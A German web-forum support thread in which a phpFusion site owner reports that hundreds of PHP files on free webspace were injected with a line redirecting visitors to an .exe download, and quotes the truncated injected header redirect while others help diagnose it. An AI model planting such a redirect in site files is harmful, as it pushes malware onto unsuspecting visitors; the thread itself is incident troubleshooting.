Registrieren | Passwort vergessen |
Benutzername    Passwort    Eingeloggt bleiben    
Seitenaufbau in 0.26 Sekunden - 412 DB-Abfragen | Mitglieder: 2377 | Forum: 15684 | Downloads: 127 | Insgesamt runtergeladen: 41154 | Insgesamt: 14,735,975 eindeutige Besuche
Guten Tag [Gast]
Wenn Sie bereits Registriert sind loggen Sie sich einfach ein
©
DerEinsame2 (04.01.2024 13:19): Hallo ihr lieben ich wünsche euch ein Frohes und es Gesundes neues jahr. Chat-Radio24 (02.01.2024 17:36): Ein Frohes neues Jahr wünsche ich allen JP_ONAIR (01.01.2024 15:33): Frohes neues ^^ DerEinsame2 (17.12.2023 17:24): liebe leute ich wünsche euche tolle feiertage, und das beste fürs neue jahr 2024 Radiotv (18.11.2023 18:39): Liebe Grüsse Von www.radiotvmg.de Charly3000 (18.05.2023 16:09): Happy Vatertag wünscht www.Charlys-Funradio.de Charly3000 (08.05.2023 00:41): Wünsche eine erfolgreiche Woche RadioNightlineStudios (05.10.2022 07:27): RADIO-NIGHTLINE-STUDIOS WÜNSCHT EINEN GOLDENEN OKTOBER Pilzwb (29.01.2022 09:28): Guten Morgen BlackScorpion (07.01.2022 23:00): https://radio-black-scorpion.de wünscht ein erholsames We
Datum: Samstag, 20. April 2024 Diese Seite Geladen Am: 12:17:23Aktuelle Zeit: Zeit
 Wer ist online
Gäste & Bots online: 1
Mitglieder online: 0
Neuestes Mitglied: Leon Schlemmer

DeviceMarioPremium bis 17.10.2024 - 09:58 UhrPunkte
Offline
DeviceArminPremium bis 25.12.2025 - 12:05 UhrPunkte
Offline
DeviceHarlekinPunkte
Offline
DevicepartybremenPunkte
Offline
DeviceEsoxPunkte
Offline
Device21MatzePunkte
Offline
DeviceRolly8-HL
Offline
DeviceJP_ONAIRPunkte
Offline
DeviceSnowFingersPunkte
Offline
DevicehexerPremium bis 24.04.2024 - 19:40 UhrPunkte
Offline
Gast
gast
Mehr anzeigen

     - SuperAdmin|         - Admin ©
     - Forum Mod |         - Mitglied


 Unwetterwarnung

 Server uptime
Serverchecks bei http://www.my-cronjob.de - Ihr kostenloser Cronjob- und Serverüberwachungsdienst mit Uptime-Statistik für Ihre Homepage

Suche
Durchsuchen Sie die gesamte Website:
Themen-Autor: mukkefeno
Thema ID: 2130
Thema Info
Es gibt 9 Beiträge zu diesem Thema, und es wurde angesehen 847 mal.
Thema ansehen
..::www.DeeoNe.de-D1Infusionen::.. » Supportbereich phpFusion v7 » Allgemeines
Wer ist hier? 1 Gäste
 Thema drucken
'NO_AUTO_CREATE_USER'
mukkefeno
Hallo,

nachdem 421 php Dateien mit Schadcode zu eine .exe datei versehen wurde, und ich diese Dateinen alle "gesäubert" habe, habe ich entweder etwas übersehen pder falsch gemacht. Denn nun kann ich mich nichtmehr auf meiner Testseite einloggen

Download Code  Code
Error: Variable 'sql_mode' can't be set to the value of 'NO_AUTO_CREATE_USER' 




jemand nen Tip?

LG
carpe diem Cool
Verwarnstatus: warningwarningwarningwarning
 
https://womr.de
Rolly8-HL
Um welchen Schadcode handelt es sich denn, damit andere auch nachschauen könne.
Gruß Rolly8-HL
Was für Andere Wichtig ist muss für mich nicht genauso Wichtig sein!
Bin Dickkopf Unbelehrbar mache aus Protest nicht das was andere für Richtig halten!
Das gibt einem zu Denken oder?
Verwarnstatus: warningwarningwarningwarning
 
https://rolly8-hl.de
mukkefeno
in den .php Dateien jeweils ganz oben direekt, wurden Links zu anderen Seiten/Unterseiten/.exe Datei hinzugefügt, so das beim aufruf der Webseite/Unterseite sofort die .exe zum Download aufpoppte
carpe diem Cool
Verwarnstatus: warningwarningwarningwarning
 
https://womr.de
MaZzIMo24
Hast du einen Codeschnipsel mit so einer betroffenen stelle?
Hast du bevor das Problem auftrat etwas neu installiert auf der Seite/auf dem Server?
mazzimo24.net/images/logo-mzcms3.png
Verwarnstatus: warningwarningwarningwarning
 
https://mazzimo24.net
mukkefeno
Download Code  Code
<?php
header("Location: https://money-dan...xe");
?>
/*-------------------------------------------------------+
| PHP-Fusion Content Management System
| Copyright (C) 2002 - 2011 Nick Jones
| http://www.php-fu...
+--------------------------------------------------------+





scheint auch an der maincore.php liegen, evtl wurde dort an anderer Stelle noch was hinzugefügt, habe nicht genauer gesucht, konnte das o.g Problem dann durch eine Backup-Datei der maincore beheben können

Nein, hatte vor dem Problem sonst nichts geändert
carpe diem Cool
Verwarnstatus: warningwarningwarningwarning
 
https://womr.de
MaZzIMo24
Hast du auf deiner Seite einen online ftp Manager laufen?
im Prinzip kann nur jemand über direkt zugriff die Zeile einfügen.
Eine Recherche wäre mal angebracht, kannst du https://money-dance.cc/ mit einem deiner User in Verbindung bringen?
mazzimo24.net/images/logo-mzcms3.png
Verwarnstatus: warningwarningwarningwarning
 
https://mazzimo24.net
mukkefeno
Es handelt sich um Free Webspace, bei united-hosting.eu, dort gibt es auch online Zugang zum ftp.

User hatte ich auf der Page keine, da rein zu Testzwecken. Der Anbieter hat mein Free Abo aus genannten gründen gespeert.

Dann viel mir selbiges bei lima-city auf, auch dort gibts nen online Zugang zum ftp...

Ich habe mir auch schonmal überlegt, das die Möglichkeit den Code "einzuschleusen" eher am Anbieter liegt/lag als an mir
carpe diem Cool
Verwarnstatus: warningwarningwarningwarning
 
https://womr.de
Rolly8-HL
Wenn es sich um Free handelt kannst Du da von ausgehen, die wollen etwas verkaufen.
Hatte so etwas schon vor Jahren, da wurde Werbung vorgeschaltet, die alle geblockt hatte, zum Schluss einen Virus für den Browser und da war ende bei mir.
Suche Dir was vernünftiges an Server.
Gruß Rolly8-HL
Was für Andere Wichtig ist muss für mich nicht genauso Wichtig sein!
Bin Dickkopf Unbelehrbar mache aus Protest nicht das was andere für Richtig halten!
Das gibt einem zu Denken oder?
Verwarnstatus: warningwarningwarningwarning
 
https://rolly8-hl.de
matze
wenn eine php datei aufgerufen wird.....und laut des Posters

>>>>

<?php
header("Location: https://money-dan... Wink;
?>
/*-------------------------------------------------------+
| PHP-Fusion Content Management System
| Copyright (C) 2002 - 2011 Nick Jones
| http://www.php-fu...
+--------------------------------------------------------+

<<<<<<<


Es gibt aber mittlerweile Mechanismen die ,,header Funktionen Prüfen,, .Da wollte wohl einer Geld verdienen.....denn diese Anfangs Buchstaben kommen mir bekannt vor....grübel

Und niche mal beim Öffnen des 2. Abschnits php geöffnet...sehr interresant.....lol


Interresant ist es mal zu wissen...das man php fusion hochladet...man gibt beim setup alles korrekt ein.......dann werden Dateien ,,manupuliert vom anbieter...sehr interresant um das mal zu wissen.....nsa verdächtigt...lol
Bearbeitet von matze am 05-02-2022 23:54
Verwarnstatus: warningwarningwarningwarning
 
https://fusion-mods.de
Springe ins Forum:
Sämtliche Grafiken und Texte dieser Seite unterliegen dem Urheberrecht und dürfen nicht ohne Erlaubnis kopiert werden!!!